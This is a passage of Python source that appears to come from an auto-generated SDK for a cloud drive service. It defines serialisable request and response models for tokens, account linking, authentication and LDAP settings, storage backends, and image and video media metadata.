        body: LinkInfoListResponse = None,
    ):
        self.headers = headers
        self.body = body

    def validate(self):
        # The payload is mandatory; deep validation is delegated to it.
        self.validate_required(self.body, 'body')
        if self.body:
            self.body.validate()

    def to_map(self):
        mapped = {}
        if self.headers is not None:
            mapped['headers'] = self.headers
        if self.body is not None:
            mapped['body'] = self.body.to_map()
        return mapped

    def from_map(self, m: dict = None):
        m = m or {}
        if m.get('headers') is not None:
            self.headers = m.get('headers')
        if m.get('body') is not None:
            self.body = LinkInfoListResponse().from_map(m['body'])
        return self
class GetPublicKeyResponse(TeaModel):
    """RSA public-key material published for an app."""
    def __init__(
        self,
        app_id: str = None,
        key_pair_id: str = None,
        public_key: str = None,
    ):
        # App ID.
        self.app_id = app_id
        # Identifier of the key pair.
        self.key_pair_id = key_pair_id
        # Public key of the RSA algorithm, PEM format.
        self.public_key = public_key

    def validate(self):
        # 'key_pair_id' is optional.
        self.validate_required(self.app_id, 'app_id')
        self.validate_required(self.public_key, 'public_key')

    def to_map(self):
        mapped = {}
        for name in ('app_id', 'key_pair_id', 'public_key'):
            value = getattr(self, name)
            if value is not None:
                mapped[name] = value
        return mapped

    def from_map(self, m: dict = None):
        m = m or {}
        for name in ('app_id', 'key_pair_id', 'public_key'):
            if m.get(name) is not None:
                setattr(self, name, m.get(name))
        return self
class GetPublicKeyModel(TeaModel):
    """Response wrapper for get-public-key: HTTP headers plus a GetPublicKeyResponse payload."""
    def __init__(
        self,
        headers: Dict[str, str] = None,
        body: GetPublicKeyResponse = None,
    ):
        self.headers = headers
        self.body = body

    def validate(self):
        # The payload is mandatory; deep validation is delegated to it.
        self.validate_required(self.body, 'body')
        if self.body:
            self.body.validate()

    def to_map(self):
        mapped = {}
        if self.headers is not None:
            mapped['headers'] = self.headers
        if self.body is not None:
            mapped['body'] = self.body.to_map()
        return mapped

    def from_map(self, m: dict = None):
        m = m or {}
        if m.get('headers') is not None:
            self.headers = m.get('headers')
        if m.get('body') is not None:
            self.body = GetPublicKeyResponse().from_map(m['body'])
        return self
class LinkModel(TeaModel):
    """Response wrapper for account link: HTTP headers plus an AccountAccessTokenResponse payload."""
    def __init__(
        self,
        headers: Dict[str, str] = None,
        body: AccountAccessTokenResponse = None,
    ):
        self.headers = headers
        self.body = body

    def validate(self):
        # The payload is mandatory; deep validation is delegated to it.
        self.validate_required(self.body, 'body')
        if self.body:
            self.body.validate()

    def to_map(self):
        mapped = {}
        if self.headers is not None:
            mapped['headers'] = self.headers
        if self.body is not None:
            mapped['body'] = self.body.to_map()
        return mapped

    def from_map(self, m: dict = None):
        m = m or {}
        if m.get('headers') is not None:
            self.headers = m.get('headers')
        if m.get('body') is not None:
            self.body = AccountAccessTokenResponse().from_map(m['body'])
        return self
class MobileCheckExistResponse(TeaModel):
    """Result of checking whether a mobile phone number is registered."""
    def __init__(
        self,
        is_exist: bool = None,
        phone_number: str = None,
        phone_region: str = None,
    ):
        # Whether the phone number already exists.
        self.is_exist = is_exist
        # The phone number that was checked.
        self.phone_number = phone_number
        # Country code, digits only without a leading '+'; defaults to 86.
        self.phone_region = phone_region

    def validate(self):
        # 'phone_region' is optional.
        self.validate_required(self.is_exist, 'is_exist')
        self.validate_required(self.phone_number, 'phone_number')

    def to_map(self):
        mapped = {}
        for name in ('is_exist', 'phone_number', 'phone_region'):
            value = getattr(self, name)
            if value is not None:
                mapped[name] = value
        return mapped

    def from_map(self, m: dict = None):
        m = m or {}
        for name in ('is_exist', 'phone_number', 'phone_region'):
            if m.get(name) is not None:
                setattr(self, name, m.get(name))
        return self
class CheckExistModel(TeaModel):
    """Response wrapper for mobile check-exist: HTTP headers plus a MobileCheckExistResponse payload."""
    def __init__(
        self,
        headers: Dict[str, str] = None,
        body: MobileCheckExistResponse = None,
    ):
        self.headers = headers
        self.body = body

    def validate(self):
        # The payload is mandatory; deep validation is delegated to it.
        self.validate_required(self.body, 'body')
        if self.body:
            self.body.validate()

    def to_map(self):
        mapped = {}
        if self.headers is not None:
            mapped['headers'] = self.headers
        if self.body is not None:
            mapped['body'] = self.body.to_map()
        return mapped

    def from_map(self, m: dict = None):
        m = m or {}
        if m.get('headers') is not None:
            self.headers = m.get('headers')
        if m.get('body') is not None:
            self.body = MobileCheckExistResponse().from_map(m['body'])
        return self
class LoginModel(TeaModel):
    """Response wrapper for login: HTTP headers plus an AccountAccessTokenResponse payload."""
    def __init__(
        self,
        headers: Dict[str, str] = None,
        body: AccountAccessTokenResponse = None,
    ):
        self.headers = headers
        self.body = body

    def validate(self):
        # The payload is mandatory; deep validation is delegated to it.
        self.validate_required(self.body, 'body')
        if self.body:
            self.body.validate()

    def to_map(self):
        mapped = {}
        if self.headers is not None:
            mapped['headers'] = self.headers
        if self.body is not None:
            mapped['body'] = self.body.to_map()
        return mapped

    def from_map(self, m: dict = None):
        m = m or {}
        if m.get('headers') is not None:
            self.headers = m.get('headers')
        if m.get('body') is not None:
            self.body = AccountAccessTokenResponse().from_map(m['body'])
        return self
class RegisterModel(TeaModel):
    """Response wrapper for register: HTTP headers plus an AccountAccessTokenResponse payload."""
    def __init__(
        self,
        headers: Dict[str, str] = None,
        body: AccountAccessTokenResponse = None,
    ):
        self.headers = headers
        self.body = body

    def validate(self):
        # The payload is mandatory; deep validation is delegated to it.
        self.validate_required(self.body, 'body')
        if self.body:
            self.body.validate()

    def to_map(self):
        mapped = {}
        if self.headers is not None:
            mapped['headers'] = self.headers
        if self.body is not None:
            mapped['body'] = self.body.to_map()
        return mapped

    def from_map(self, m: dict = None):
        m = m or {}
        if m.get('headers') is not None:
            self.headers = m.get('headers')
        if m.get('body') is not None:
            self.body = AccountAccessTokenResponse().from_map(m['body'])
        return self
class MobileSendSmsCodeResponse(TeaModel):
    """Result of sending an SMS verification code."""
    def __init__(
        self,
        sms_code_id: str = None,
    ):
        # Identifier of the SMS verification code.
        self.sms_code_id = sms_code_id

    def validate(self):
        self.validate_required(self.sms_code_id, 'sms_code_id')

    def to_map(self):
        mapped = {}
        if self.sms_code_id is not None:
            mapped['sms_code_id'] = self.sms_code_id
        return mapped

    def from_map(self, m: dict = None):
        m = m or {}
        if m.get('sms_code_id') is not None:
            self.sms_code_id = m.get('sms_code_id')
        return self
class MobileSendSmsCodeModel(TeaModel):
    """Response wrapper for mobile send-sms-code: HTTP headers plus a MobileSendSmsCodeResponse payload."""
    def __init__(
        self,
        headers: Dict[str, str] = None,
        body: MobileSendSmsCodeResponse = None,
    ):
        self.headers = headers
        self.body = body

    def validate(self):
        # The payload is mandatory; deep validation is delegated to it.
        self.validate_required(self.body, 'body')
        if self.body:
            self.body.validate()

    def to_map(self):
        mapped = {}
        if self.headers is not None:
            mapped['headers'] = self.headers
        if self.body is not None:
            mapped['body'] = self.body.to_map()
        return mapped

    def from_map(self, m: dict = None):
        m = m or {}
        if m.get('headers') is not None:
            self.headers = m.get('headers')
        if m.get('body') is not None:
            self.body = MobileSendSmsCodeResponse().from_map(m['body'])
        return self
class AccountRevokeModel(TeaModel):
    """Response wrapper for account revoke: HTTP headers only, no body."""
    def __init__(
        self,
        headers: Dict[str, str] = None,
    ):
        self.headers = headers

    def validate(self):
        # Nothing to validate: every field is optional.
        pass

    def to_map(self):
        mapped = {}
        if self.headers is not None:
            mapped['headers'] = self.headers
        return mapped

    def from_map(self, m: dict = None):
        m = m or {}
        if m.get('headers') is not None:
            self.headers = m.get('headers')
        return self
class AccountTokenModel(TeaModel):
    """Response wrapper for account token: HTTP headers plus an AccountAccessTokenResponse payload."""
    def __init__(
        self,
        headers: Dict[str, str] = None,
        body: AccountAccessTokenResponse = None,
    ):
        self.headers = headers
        self.body = body

    def validate(self):
        # The payload is mandatory; deep validation is delegated to it.
        self.validate_required(self.body, 'body')
        if self.body:
            self.body.validate()

    def to_map(self):
        mapped = {}
        if self.headers is not None:
            mapped['headers'] = self.headers
        if self.body is not None:
            mapped['body'] = self.body.to_map()
        return mapped

    def from_map(self, m: dict = None):
        m = m or {}
        if m.get('headers') is not None:
            self.headers = m.get('headers')
        if m.get('body') is not None:
            self.body = AccountAccessTokenResponse().from_map(m['body'])
        return self
class AccessTokenResponse(TeaModel):
    """An issued access token and its associated session details."""
    def __init__(
        self,
        access_token: str = None,
        default_drive_id: str = None,
        expire_time: str = None,
        expires_in: int = None,
        refresh_token: str = None,
        role: str = None,
        token_type: str = None,
        user_id: str = None,
    ):
        # Access token used to call the business APIs.
        self.access_token = access_token
        # Default Drive ID.
        self.default_drive_id = default_drive_id
        # Expiration time of the access token, ISO format.
        self.expire_time = expire_time
        # Lifetime of the access token, in seconds.
        self.expires_in = expires_in
        # Token used to refresh the access token.
        self.refresh_token = refresh_token
        # Role of the current user.
        self.role = role
        # Type of the access token, e.g. "Bearer".
        self.token_type = token_type
        # ID of the current user.
        self.user_id = user_id

    def validate(self):
        # Every field is required.
        for name in ('access_token', 'default_drive_id', 'expire_time',
                     'expires_in', 'refresh_token', 'role', 'token_type',
                     'user_id'):
            self.validate_required(getattr(self, name), name)

    def to_map(self):
        mapped = {}
        for name in ('access_token', 'default_drive_id', 'expire_time',
                     'expires_in', 'refresh_token', 'role', 'token_type',
                     'user_id'):
            value = getattr(self, name)
            if value is not None:
                mapped[name] = value
        return mapped

    def from_map(self, m: dict = None):
        m = m or {}
        for name in ('access_token', 'default_drive_id', 'expire_time',
                     'expires_in', 'refresh_token', 'role', 'token_type',
                     'user_id'):
            if m.get(name) is not None:
                setattr(self, name, m.get(name))
        return self
class AccountLinkRequest(TeaModel):
    """Request to bind an authentication identity (link) to a user account."""
    def __init__(
        self,
        headers: Dict[str, str] = None,
        detail: str = None,
        extra: str = None,
        identity: str = None,
        status: str = None,
        type: str = None,
        user_id: str = None,
    ):
        self.headers = headers
        # Account information.
        self.detail = detail
        # Extra info; e.g. for type "mobile" this holds the country code (defaults to 86).
        self.extra = extra
        # Unique identity of the link.
        self.identity = identity
        # Status of the link.
        self.status = status
        # Authentication type.
        self.type = type
        # The user_id to bind to.
        self.user_id = user_id

    def validate(self):
        # Only identity, type and user_id are mandatory.
        for name in ('identity', 'type', 'user_id'):
            self.validate_required(getattr(self, name), name)

    def to_map(self):
        mapped = {}
        for name in ('headers', 'detail', 'extra', 'identity', 'status',
                     'type', 'user_id'):
            value = getattr(self, name)
            if value is not None:
                mapped[name] = value
        return mapped

    def from_map(self, m: dict = None):
        m = m or {}
        for name in ('headers', 'detail', 'extra', 'identity', 'status',
                     'type', 'user_id'):
            if m.get(name) is not None:
                setattr(self, name, m.get(name))
        return self
class AccountTokenRequest(TeaModel):
    """Request to exchange a refresh token for a new account access token."""
    def __init__(
        self,
        headers: Dict[str, str] = None,
        addition_data: dict = None,
        app_id: str = None,
        grant_type: str = None,
        refresh_token: str = None,
    ):
        self.headers = headers
        # Additional data.
        self.addition_data = addition_data
        # App ID of the app currently being accessed.
        self.app_id = app_id
        # Must be "refresh_token".
        self.grant_type = grant_type
        # Refresh token returned at login time.
        self.refresh_token = refresh_token

    def validate(self):
        # headers and addition_data are optional.
        for name in ('app_id', 'grant_type', 'refresh_token'):
            self.validate_required(getattr(self, name), name)

    def to_map(self):
        mapped = {}
        for name in ('headers', 'addition_data', 'app_id', 'grant_type',
                     'refresh_token'):
            value = getattr(self, name)
            if value is not None:
                mapped[name] = value
        return mapped

    def from_map(self, m: dict = None):
        m = m or {}
        for name in ('headers', 'addition_data', 'app_id', 'grant_type',
                     'refresh_token'):
            if m.get(name) is not None:
                setattr(self, name, m.get(name))
        return self
class AddStoreRequest(TeaModel):
    """Request to register a storage backend for a domain."""
    def __init__(
        self,
        base_path: str = None,
        bucket: str = None,
        domain_id: str = None,
        endpoint: str = None,
        ownership: str = None,
        role_arn: str = None,
        type: str = None,
    ):
        # Common prefix of the storage paths.
        self.base_path = base_path
        # Bucket name.
        self.bucket = bucket
        # Domain ID.
        self.domain_id = domain_id
        # Storage access endpoint.
        self.endpoint = endpoint
        # Storage ownership: "system" means platform-provided, "custom" means the caller's own storage.
        self.ownership = ownership
        # ARN of the role used to access the bucket.
        self.role_arn = role_arn
        # Storage type; currently only "oss" is supported.
        self.type = type

    def validate(self):
        # Only domain_id, endpoint and type are mandatory.
        for name in ('domain_id', 'endpoint', 'type'):
            self.validate_required(getattr(self, name), name)

    def to_map(self):
        mapped = {}
        for name in ('base_path', 'bucket', 'domain_id', 'endpoint',
                     'ownership', 'role_arn', 'type'):
            value = getattr(self, name)
            if value is not None:
                mapped[name] = value
        return mapped

    def from_map(self, m: dict = None):
        m = m or {}
        for name in ('base_path', 'bucket', 'domain_id', 'endpoint',
                     'ownership', 'role_arn', 'type'):
            if m.get(name) is not None:
                setattr(self, name, m.get(name))
        return self
class AppAccessStrategy(TeaModel):
    """Access strategy for apps: an effect plus a list of exempted app IDs."""
    def __init__(
        self,
        effect: str = None,
        except_app_id_list: List[str] = None,
    ):
        self.effect = effect
        self.except_app_id_list = except_app_id_list

    def validate(self):
        # Nothing to validate: every field is optional.
        pass

    def to_map(self):
        mapped = {}
        for name in ('effect', 'except_app_id_list'):
            value = getattr(self, name)
            if value is not None:
                mapped[name] = value
        return mapped

    def from_map(self, m: dict = None):
        m = m or {}
        for name in ('effect', 'except_app_id_list'):
            if m.get(name) is not None:
                setattr(self, name, m.get(name))
        return self
class LdapConfig(TeaModel):
    """Connection settings for an LDAP directory."""
    def __init__(
        self,
        admin_dn: str = None,
        admin_password: str = None,
        base_dn: str = None,
        host: str = None,
        port: int = None,
        uid: str = None,
    ):
        self.admin_dn = admin_dn
        self.admin_password = admin_password
        self.base_dn = base_dn
        self.host = host
        self.port = port
        self.uid = uid

    def validate(self):
        # Nothing to validate: every field is optional.
        pass

    def to_map(self):
        mapped = {}
        for name in ('admin_dn', 'admin_password', 'base_dn', 'host',
                     'port', 'uid'):
            value = getattr(self, name)
            if value is not None:
                mapped[name] = value
        return mapped

    def from_map(self, m: dict = None):
        m = m or {}
        for name in ('admin_dn', 'admin_password', 'base_dn', 'host',
                     'port', 'uid'):
            if m.get(name) is not None:
                setattr(self, name, m.get(name))
        return self
class AuthConfig(TeaModel):
    """Authentication provider configuration, including an optional nested LdapConfig."""
    def __init__(
        self,
        app_id: str = None,
        app_secret: str = None,
        callback_security: bool = None,
        enable: bool = None,
        endpoint: str = None,
        enterprise_id: str = None,
        ldap_config: LdapConfig = None,
        login_page_headers: dict = None,
        login_page_template: str = None,
        login_page_vars: dict = None,
        white_list_config: dict = None,
        white_list_enable: bool = None,
    ):
        self.app_id = app_id
        self.app_secret = app_secret
        self.callback_security = callback_security
        self.enable = enable
        self.endpoint = endpoint
        self.enterprise_id = enterprise_id
        self.ldap_config = ldap_config
        self.login_page_headers = login_page_headers
        self.login_page_template = login_page_template
        self.login_page_vars = login_page_vars
        self.white_list_config = white_list_config
        self.white_list_enable = white_list_enable

    def validate(self):
        # Only the nested LDAP config carries validation rules.
        if self.ldap_config:
            self.ldap_config.validate()

    def to_map(self):
        mapped = {}
        for name in ('app_id', 'app_secret', 'callback_security', 'enable',
                     'endpoint', 'enterprise_id', 'ldap_config',
                     'login_page_headers', 'login_page_template',
                     'login_page_vars', 'white_list_config',
                     'white_list_enable'):
            value = getattr(self, name)
            if value is None:
                continue
            # The nested model serializes through its own to_map().
            mapped[name] = value.to_map() if name == 'ldap_config' else value
        return mapped

    def from_map(self, m: dict = None):
        m = m or {}
        for name in ('app_id', 'app_secret', 'callback_security', 'enable',
                     'endpoint', 'enterprise_id', 'ldap_config',
                     'login_page_headers', 'login_page_template',
                     'login_page_vars', 'white_list_config',
                     'white_list_enable'):
            value = m.get(name)
            if value is None:
                continue
            if name == 'ldap_config':
                self.ldap_config = LdapConfig().from_map(value)
            else:
                setattr(self, name, value)
        return self
class AuthorizeRequest(TeaModel):
    """OAuth-style authorize request; note the wire keys are CamelCase, unlike the snake_case attributes."""
    def __init__(
        self,
        client_id: str = None,
        login_type: str = None,
        redirect_uri: str = None,
        response_type: str = None,
        scope: List[str] = None,
        state: str = None,
        user_code: str = None,
    ):
        # Client ID; the AppID returned when the app was created.
        self.client_id = client_id
        # Authentication method; currently "ding" and "ram" are supported.
        self.login_type = login_type
        # Callback address; the redirect URI configured when the app was created.
        self.redirect_uri = redirect_uri
        # Response type; only "code" may be supplied.
        self.response_type = response_type
        # Requested permission list; defaults to all permissions.
        self.scope = scope
        # Caller-defined value, echoed back in the callback after successful auth.
        self.state = state
        # For internal use.
        self.user_code = user_code

    # Attribute name -> serialized (CamelCase) key.
    def _pairs(self):
        return (
            ('client_id', 'ClientID'),
            ('login_type', 'LoginType'),
            ('redirect_uri', 'RedirectUri'),
            ('response_type', 'ResponseType'),
            ('scope', 'Scope'),
            ('state', 'State'),
            ('user_code', 'UserCode'),
        )

    def validate(self):
        # client_id, redirect_uri and response_type are mandatory.
        for name in ('client_id', 'redirect_uri', 'response_type'):
            self.validate_required(getattr(self, name), name)

    def to_map(self):
        mapped = {}
        for attr, key in self._pairs():
            value = getattr(self, attr)
            if value is not None:
                mapped[key] = value
        return mapped

    def from_map(self, m: dict = None):
        m = m or {}
        for attr, key in self._pairs():
            if m.get(key) is not None:
                setattr(self, attr, m.get(key))
        return self
class CroppingBoundary(TeaModel):
    """Rectangular region (top/left origin with width and height) for an image crop."""
    def __init__(
        self,
        height: int = None,
        left: int = None,
        top: int = None,
        width: int = None,
    ):
        self.height = height
        self.left = left
        self.top = top
        self.width = width

    def validate(self):
        # Nothing to validate: every field is optional.
        pass

    def to_map(self):
        mapped = {}
        for name in ('height', 'left', 'top', 'width'):
            value = getattr(self, name)
            if value is not None:
                mapped[name] = value
        return mapped

    def from_map(self, m: dict = None):
        m = m or {}
        for name in ('height', 'left', 'top', 'width'):
            if m.get(name) is not None:
                setattr(self, name, m.get(name))
        return self
class CroppingSuggestionItem(TeaModel):
    """One suggested crop: an aspect ratio, its boundary, and a confidence score."""
    def __init__(
        self,
        aspect_ratio: str = None,
        cropping_boundary: CroppingBoundary = None,
        score: float = None,
    ):
        self.aspect_ratio = aspect_ratio
        self.cropping_boundary = cropping_boundary
        self.score = score

    def validate(self):
        # Only the nested boundary carries validation rules.
        if self.cropping_boundary:
            self.cropping_boundary.validate()

    def to_map(self):
        mapped = {}
        if self.aspect_ratio is not None:
            mapped['aspect_ratio'] = self.aspect_ratio
        if self.cropping_boundary is not None:
            mapped['cropping_boundary'] = self.cropping_boundary.to_map()
        if self.score is not None:
            mapped['score'] = self.score
        return mapped

    def from_map(self, m: dict = None):
        m = m or {}
        if m.get('aspect_ratio') is not None:
            self.aspect_ratio = m.get('aspect_ratio')
        if m.get('cropping_boundary') is not None:
            self.cropping_boundary = CroppingBoundary().from_map(
                m['cropping_boundary'])
        if m.get('score') is not None:
            self.score = m.get('score')
        return self
class ImageQuality(TeaModel):
    """Per-dimension quality metrics and scores for an image."""
    def __init__(
        self,
        clarity: float = None,
        clarity_score: float = None,
        color: float = None,
        color_score: float = None,
        composition_score: float = None,
        contrast: float = None,
        contrast_score: float = None,
        exposure: float = None,
        exposure_score: float = None,
        overall_score: float = None,
    ):
        self.clarity = clarity
        self.clarity_score = clarity_score
        self.color = color
        self.color_score = color_score
        self.composition_score = composition_score
        self.contrast = contrast
        self.contrast_score = contrast_score
        self.exposure = exposure
        self.exposure_score = exposure_score
        self.overall_score = overall_score

    def validate(self):
        # Nothing to validate: every field is optional.
        pass

    def to_map(self):
        mapped = {}
        for name in ('clarity', 'clarity_score', 'color', 'color_score',
                     'composition_score', 'contrast', 'contrast_score',
                     'exposure', 'exposure_score', 'overall_score'):
            value = getattr(self, name)
            if value is not None:
                mapped[name] = value
        return mapped

    def from_map(self, m: dict = None):
        m = m or {}
        for name in ('clarity', 'clarity_score', 'color', 'color_score',
                     'composition_score', 'contrast', 'contrast_score',
                     'exposure', 'exposure_score', 'overall_score'):
            if m.get(name) is not None:
                setattr(self, name, m.get(name))
        return self
class SystemTag(TeaModel):
    """A system-generated tag on a media item, with confidence and hierarchy info."""
    def __init__(
        self,
        confidence: float = None,
        en_name: str = None,
        name: str = None,
        parent_en_name: str = None,
        parent_name: str = None,
        selected: bool = None,
        source: str = None,
        tag_level: int = None,
    ):
        self.confidence = confidence
        self.en_name = en_name
        self.name = name
        self.parent_en_name = parent_en_name
        self.parent_name = parent_name
        self.selected = selected
        self.source = source
        self.tag_level = tag_level

    def validate(self):
        # Nothing to validate: every field is optional.
        pass

    def to_map(self):
        mapped = {}
        for name in ('confidence', 'en_name', 'name', 'parent_en_name',
                     'parent_name', 'selected', 'source', 'tag_level'):
            value = getattr(self, name)
            if value is not None:
                mapped[name] = value
        return mapped

    def from_map(self, m: dict = None):
        m = m or {}
        for name in ('confidence', 'en_name', 'name', 'parent_en_name',
                     'parent_name', 'selected', 'source', 'tag_level'):
            if m.get(name) is not None:
                setattr(self, name, m.get(name))
        return self
class ImageMediaResponse(TeaModel):
    """Image media metadata: geo/EXIF information, quality scores,
    system tags and cropping suggestions for an image file."""

    def __init__(
        self,
        address_line: str = None,
        city: str = None,
        country: str = None,
        cropping_suggestion: List[CroppingSuggestionItem] = None,
        district: str = None,
        exif: str = None,
        faces: str = None,
        height: int = None,
        image_quality: ImageQuality = None,
        image_tags: List[SystemTag] = None,
        location: str = None,
        province: str = None,
        story_image_score: float = None,
        time: str = None,
        township: str = None,
        width: int = None,
    ):
        # address_line
        self.address_line = address_line
        # city
        self.city = city
        # country
        self.country = country
        # suggested crop regions
        self.cropping_suggestion = cropping_suggestion
        # district
        self.district = district
        # exif json string
        self.exif = exif
        # faces json string
        self.faces = faces
        # height
        self.height = height
        # image quality scores
        self.image_quality = image_quality
        # system tags attached to the image
        self.image_tags = image_tags
        # location
        self.location = location
        # province
        self.province = province
        # story_image_score
        self.story_image_score = story_image_score
        # time
        self.time = time
        # township
        self.township = township
        # width
        self.width = width

    def validate(self):
        # Recursively validate nested models when present.
        for item in self.cropping_suggestion or []:
            if item:
                item.validate()
        if self.image_quality:
            self.image_quality.validate()
        for item in self.image_tags or []:
            if item:
                item.validate()

    def to_map(self):
        data = dict()
        if self.address_line is not None:
            data['address_line'] = self.address_line
        if self.city is not None:
            data['city'] = self.city
        if self.country is not None:
            data['country'] = self.country
        # List keys are always emitted, even when empty.
        data['cropping_suggestion'] = []
        if self.cropping_suggestion is not None:
            data['cropping_suggestion'] = [
                item.to_map() if item else None
                for item in self.cropping_suggestion
            ]
        if self.district is not None:
            data['district'] = self.district
        if self.exif is not None:
            data['exif'] = self.exif
        if self.faces is not None:
            data['faces'] = self.faces
        if self.height is not None:
            data['height'] = self.height
        if self.image_quality is not None:
            data['image_quality'] = self.image_quality.to_map()
        data['image_tags'] = []
        if self.image_tags is not None:
            data['image_tags'] = [
                item.to_map() if item else None for item in self.image_tags
            ]
        if self.location is not None:
            data['location'] = self.location
        if self.province is not None:
            data['province'] = self.province
        if self.story_image_score is not None:
            data['story_image_score'] = self.story_image_score
        if self.time is not None:
            data['time'] = self.time
        if self.township is not None:
            data['township'] = self.township
        if self.width is not None:
            data['width'] = self.width
        return data

    def from_map(self, m: dict = None):
        source = m or dict()
        if source.get('address_line') is not None:
            self.address_line = source.get('address_line')
        if source.get('city') is not None:
            self.city = source.get('city')
        if source.get('country') is not None:
            self.country = source.get('country')
        # List attributes are always reset, even when the key is absent.
        self.cropping_suggestion = []
        if source.get('cropping_suggestion') is not None:
            self.cropping_suggestion = [
                CroppingSuggestionItem().from_map(item)
                for item in source.get('cropping_suggestion')
            ]
        if source.get('district') is not None:
            self.district = source.get('district')
        if source.get('exif') is not None:
            self.exif = source.get('exif')
        if source.get('faces') is not None:
            self.faces = source.get('faces')
        if source.get('height') is not None:
            self.height = source.get('height')
        if source.get('image_quality') is not None:
            self.image_quality = ImageQuality().from_map(source.get('image_quality'))
        self.image_tags = []
        if source.get('image_tags') is not None:
            self.image_tags = [
                SystemTag().from_map(item) for item in source.get('image_tags')
            ]
        if source.get('location') is not None:
            self.location = source.get('location')
        if source.get('province') is not None:
            self.province = source.get('province')
        if source.get('story_image_score') is not None:
            self.story_image_score = source.get('story_image_score')
        if source.get('time') is not None:
            self.time = source.get('time')
        if source.get('township') is not None:
            self.township = source.get('township')
        if source.get('width') is not None:
            self.width = source.get('width')
        return self
class VideoMediaAudioStream(TeaModel):
    """Audio-stream metadata of a video file."""

    # Serialized keys are identical to attribute names, in declaration order.
    _FIELDS = (
        'bit_rate', 'channel_layout', 'channels',
        'code_name', 'duration', 'sample_rate',
    )

    def __init__(
        self,
        bit_rate: str = None,
        channel_layout: str = None,
        channels: int = None,
        code_name: str = None,
        duration: str = None,
        sample_rate: str = None,
    ):
        # audio bit rate, in bps
        self.bit_rate = bit_rate
        # channel layout
        self.channel_layout = channel_layout
        # number of audio channels
        self.channels = channels
        # audio codec name
        self.code_name = code_name
        # duration, in seconds
        self.duration = duration
        # audio sample rate
        self.sample_rate = sample_rate

    def validate(self):
        pass

    def to_map(self):
        # Emit only the fields that are set, preserving declaration order.
        return {
            key: getattr(self, key)
            for key in self._FIELDS
            if getattr(self, key) is not None
        }

    def from_map(self, m: dict = None):
        source = m or {}
        for key in self._FIELDS:
            if source.get(key) is not None:
                setattr(self, key, source.get(key))
        return self
class VideoMediaVideoStream(TeaModel):
    """Video-stream metadata of a video file."""

    # Serialized keys are identical to attribute names, in declaration order.
    _FIELDS = ('bitrate', 'clarity', 'code_name', 'duration', 'fps', 'rotate')

    def __init__(
        self,
        bitrate: str = None,
        clarity: str = None,
        code_name: str = None,
        duration: str = None,
        fps: str = None,
        rotate: str = None,
    ):
        # video bit rate, in bps
        self.bitrate = bitrate
        # clarity / definition (from scan)
        self.clarity = clarity
        # video codec name
        self.code_name = code_name
        # duration, in seconds
        self.duration = duration
        # average video frame rate
        self.fps = fps
        # rotation / orientation (landscape vs portrait)
        self.rotate = rotate

    def validate(self):
        pass

    def to_map(self):
        # Emit only the fields that are set, preserving declaration order.
        return {
            key: getattr(self, key)
            for key in self._FIELDS
            if getattr(self, key) is not None
        }

    def from_map(self, m: dict = None):
        source = m or {}
        for key in self._FIELDS:
            if source.get(key) is not None:
                setattr(self, key, source.get(key))
        return self
class VideoMediaResponse(TeaModel):
    """Video media metadata: geo/time information, system tags, and the
    audio/video stream descriptions of a video file."""

    def __init__(
        self,
        address_line: str = None,
        city: str = None,
        country: str = None,
        district: str = None,
        duration: str = None,
        height: int = None,
        image_tags: List[SystemTag] = None,
        location: str = None,
        province: str = None,
        time: str = None,
        township: str = None,
        video_media_audio_stream: List[VideoMediaAudioStream] = None,
        video_media_video_stream: List[VideoMediaVideoStream] = None,
        width: int = None,
    ):
        # address_line
        self.address_line = address_line
        # city
        self.city = city
        # country
        self.country = country
        # district
        self.district = district
        # duration, in seconds
        self.duration = duration
        # height
        self.height = height
        # system tags
        self.image_tags = image_tags
        # location
        self.location = location
        # province
        self.province = province
        # time
        self.time = time
        # township
        self.township = township
        # audio streams of the video
        self.video_media_audio_stream = video_media_audio_stream
        # video streams of the video
        self.video_media_video_stream = video_media_video_stream
        # width
        self.width = width

    def validate(self):
        # Recursively validate nested models when present.
        for item in self.image_tags or []:
            if item:
                item.validate()
        for item in self.video_media_audio_stream or []:
            if item:
                item.validate()
        for item in self.video_media_video_stream or []:
            if item:
                item.validate()

    def to_map(self):
        data = dict()
        if self.address_line is not None:
            data['address_line'] = self.address_line
        if self.city is not None:
            data['city'] = self.city
        if self.country is not None:
            data['country'] = self.country
        if self.district is not None:
            data['district'] = self.district
        if self.duration is not None:
            data['duration'] = self.duration
        if self.height is not None:
            data['height'] = self.height
        # List keys are always emitted, even when empty.
        data['image_tags'] = []
        if self.image_tags is not None:
            data['image_tags'] = [
                item.to_map() if item else None for item in self.image_tags
            ]
        if self.location is not None:
            data['location'] = self.location
        if self.province is not None:
            data['province'] = self.province
        if self.time is not None:
            data['time'] = self.time
        if self.township is not None:
            data['township'] = self.township
        data['video_media_audio_stream'] = []
        if self.video_media_audio_stream is not None:
            data['video_media_audio_stream'] = [
                item.to_map() if item else None
                for item in self.video_media_audio_stream
            ]
        data['video_media_video_stream'] = []
        if self.video_media_video_stream is not None:
            data['video_media_video_stream'] = [
                item.to_map() if item else None
                for item in self.video_media_video_stream
            ]
        if self.width is not None:
            data['width'] = self.width
        return data

    def from_map(self, m: dict = None):
        source = m or dict()
        if source.get('address_line') is not None:
            self.address_line = source.get('address_line')
        if source.get('city') is not None:
            self.city = source.get('city')
        if source.get('country') is not None:
            self.country = source.get('country')
        if source.get('district') is not None:
            self.district = source.get('district')
        if source.get('duration') is not None:
            self.duration = source.get('duration')
        if source.get('height') is not None:
            self.height = source.get('height')
        # List attributes are always reset, even when the key is absent.
        self.image_tags = []
        if source.get('image_tags') is not None:
            self.image_tags = [
                SystemTag().from_map(item) for item in source.get('image_tags')
            ]
        if source.get('location') is not None:
            self.location = source.get('location')
        if source.get('province') is not None:
            self.province = source.get('province')
        if source.get('time') is not None:
            self.time = source.get('time')
        if source.get('township') is not None:
            self.township = source.get('township')
        self.video_media_audio_stream = []
        if source.get('video_media_audio_stream') is not None:
            self.video_media_audio_stream = [
                VideoMediaAudioStream().from_map(item)
                for item in source.get('video_media_audio_stream')
            ]
        self.video_media_video_stream = []
        if source.get('video_media_video_stream') is not None:
            self.video_media_video_stream = [
                VideoMediaVideoStream().from_map(item)
                for item in source.get('video_media_video_stream')
            ]
        if source.get('width') is not None:
            self.width = source.get('width')
        return self
class VideoPreviewAudioMeta(TeaModel):
    """Audio metadata attached to a video preview."""

    # Serialized keys are identical to attribute names, in declaration order.
    _FIELDS = ('bitrate', 'channels', 'duration', 'sample_rate')

    def __init__(
        self,
        bitrate: float = None,
        channels: int = None,
        duration: float = None,
        sample_rate: float = None,
    ):
        # bitrate
        self.bitrate = bitrate
        # channels
        self.channels = channels
        # duration
